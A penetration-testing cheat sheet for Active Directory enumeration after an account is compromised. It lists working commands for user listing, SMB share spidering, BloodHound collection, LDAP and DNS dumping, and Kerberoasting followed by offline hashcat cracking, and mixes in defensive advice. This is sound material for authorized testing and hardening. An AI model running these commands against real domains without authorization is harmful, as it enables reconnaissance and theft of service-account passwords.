Username and Password Owned

  1. Find all users

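# List domain users with an already-owned account ($ip = domain controller).
# The wrapper name is case-sensitive: it is GetADUsers, not GetAdUsers.
# No password is given on this line, so impacket prompts for it; that keeps the
# secret out of shell history and the process list.
impacket-GetADUsers -all -dc-ip "$ip" domain.local/username
# Same listing over SMB. Here the password is an argument, so it is visible in
# `ps` output and shell history on the testing host.
# Defender view: any domain account can normally read this list, so what is
# worth reviewing is what the user attributes expose (e.g. description fields).
nxc smb "$ip" -u 'username' -p 'password' --users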
  1. Enum SMB shares

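# Walk every share this account can read and record what is in it.
# NOTE(review): by default the module appears to write a file listing
# (metadata) rather than download content; confirm for the installed version.
# The listing shows exactly what an ordinary account can reach, so treat the
# output as sensitive and use it to review share ACLs (scripts, configs, backups).
nxc smb "$ip" -u 'username' -p 'password' -M spider_plus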

  1. Bloodhound

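# Collect AD objects and relationships for BloodHound.
#   -gc  hostname of the global catalog / DC ($hostname)
#   -ns  DNS server used to resolve domain names ($ip)
#   -c all  runs the full set of collection methods; this queries member
#           computers as well as the DC, so it is more visible in logs than
#           a DC-only collection (-c DCOnly).
# The JSON output describes users, groups and ACLs for the whole domain; store
# it as sensitive engagement data. The password is passed on the command line
# and is visible in the process list and shell history.
bloodhound-python -d domain.local -u username -p password -gc "$hostname" -c all -ns "$ip"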

  1. LDAP Enum

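# Run every ldapsearch-ad check (-t all) against the LDAP server at $ip and
# write the results to output.log (-o).
# The log holds directory data gathered with the supplied account; keep it with
# the rest of the engagement evidence rather than in a shared working directory.
ldapsearch-ad.py -l "$ip" -d domain.local -u username -p 'password' -o output.log -t all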

  1. Enumerate DNS

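# Print the DNS zones stored in Active Directory.
# The account is given as DOMAIN\user; single quotes keep the backslash literal.
# Placeholders follow the rest of this page (domain.local, username, password,
# $ip = domain controller) instead of <angle brackets>, which the shell would
# parse as redirections and could create or truncate local files.
# Defender view: AD-integrated zone contents are typically readable by any
# authenticated user, so records there should be assumed visible to every
# domain account.
adidnsdump -u 'domain.local\username' -p 'password' --print-zones "$ip"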

  1. Kerberoasting

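# Request service tickets for accounts that have an SPN. Each ticket is
# encrypted with a key derived from the service account's password, which is
# why a weak service-account password can be recovered offline.
# Run without sudo: neither command needs root, and running network-facing
# tooling as root only widens the impact of a bug in it.
# impacket prompts for the password because none is given on the command line.
impacket-GetUserSPNs -request -dc-ip "$ip" domain.local/username
# -m 13100 is hashcat's mode for Kerberos 5 TGS-REP etype 23 (RC4).
# hashes.kerberoast is expected to contain the hashes printed by the command
# above; that command does not create the file by itself.
# --force overrides hashcat's own warnings; results obtained with it are less
# trustworthy, so drop it wherever hashcat runs without it.
# Defender view: give SPN accounts long random passwords (or use gMSAs), prefer
# AES-only service accounts, and alert on event 4769 requests with ticket
# encryption type 0x17.
hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force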
